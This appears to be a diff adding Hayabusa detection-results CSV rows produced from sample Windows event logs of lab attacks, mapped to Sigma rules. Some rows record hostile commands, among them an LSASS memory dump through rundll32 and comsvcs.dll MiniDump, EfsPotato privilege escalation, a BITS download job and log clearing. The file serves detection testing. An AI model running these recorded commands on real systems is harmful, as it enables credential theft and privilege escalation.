+2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: Temp\bouWFQYO.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
+2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test  :  URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx
+2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe  whoami  :  Path: C:\temp\EfsPotato.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\temp\EfsPotato.exe  whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding  :  Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx
+2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx
+2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: -  :  SID: S-1-5-21-3410678313-1251427014-1131291384-1004  :  Group: None  :  Subject user: admmig  :  Subject domain: OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
+2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3  :  SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
+2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx
+2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx
+2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig  :  Workstation: -  :  IP Address: ::1  :  Port: 0  :  LogonID: 0x266e045  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: OFFSEC\admmig  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: ""C:\Windows\System32\rundll32.exe""  C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full  :  Path: C:\Windows\System32\rundll32.exe  :  User: OFFSEC\admmig  :  Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 49192  :  LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 38940  :  LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 54742  :  LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 54742  :  LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 54742  :  LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\2V7Be7Gq.dmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\2V7Be7Gq.dmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\2V7Be7Gq.dmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe  //e:jscript testme.js  :  Path: C:\Windows\System32\cscript.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:""""  :  Path: C:\Windows\System32\cmdkey.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: cscript.exe  //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe""   :  Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: cscript.exe  //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
